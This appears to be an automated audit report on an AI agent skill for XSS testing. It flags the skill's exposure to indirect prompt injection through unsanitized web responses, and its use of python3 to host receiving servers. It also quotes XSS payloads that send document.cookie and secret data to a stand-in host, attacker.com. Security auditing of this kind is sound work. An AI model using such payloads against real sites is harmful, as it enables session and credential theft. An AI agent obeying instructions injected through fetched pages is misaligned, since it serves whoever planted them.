xss-methodology

Pass

Audited by Gen Agent Trust Hub on May 15, 2026

Risk Level: SAFE
Findings: PROMPT_INJECTION, DATA_EXFILTRATION, COMMAND_EXECUTION
Full Analysis
  • [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection as it instructs the agent to ingest and analyze untrusted data from web responses.
  • Ingestion points: Target website responses (HTML body, headers) retrieved via the http_request tool as described in SKILL.md (Phase 0).
  • Boundary markers: Absent. The instructions do not specify delimiters or warnings to ignore embedded instructions in the processed data.
  • Capability inventory: The agent has access to http_request for network operations and python3 for script execution.
  • Sanitization: Absent. No validation or escaping of external content is mandated before the agent processes the data.
  • [DATA_EXFILTRATION]: The skill provides methodology and specific payloads for exfiltrating sensitive data, which is consistent with its role as a security testing tool.
  • Evidence: AGENT.md instructs the agent to "窃取 cookie 或读取页面内容" (steal cookies or read page content). references/xss-bypass-and-types.md contains payloads such as location='https://attacker.com/?c='+document.cookie and <link rel=prefetch href="http://attacker.com/?c=SECRET_DATA">.
  • [COMMAND_EXECUTION]: The skill facilitates the execution of local scripts and the hosting of servers to support testing operations.
  • Evidence: AGENT.md explicitly lists python3 as a preferred tool for encoding payloads and starting receiving servers.
Audit Metadata
Risk Level: SAFE
Analyzed: May 15, 2026, 01:38 PM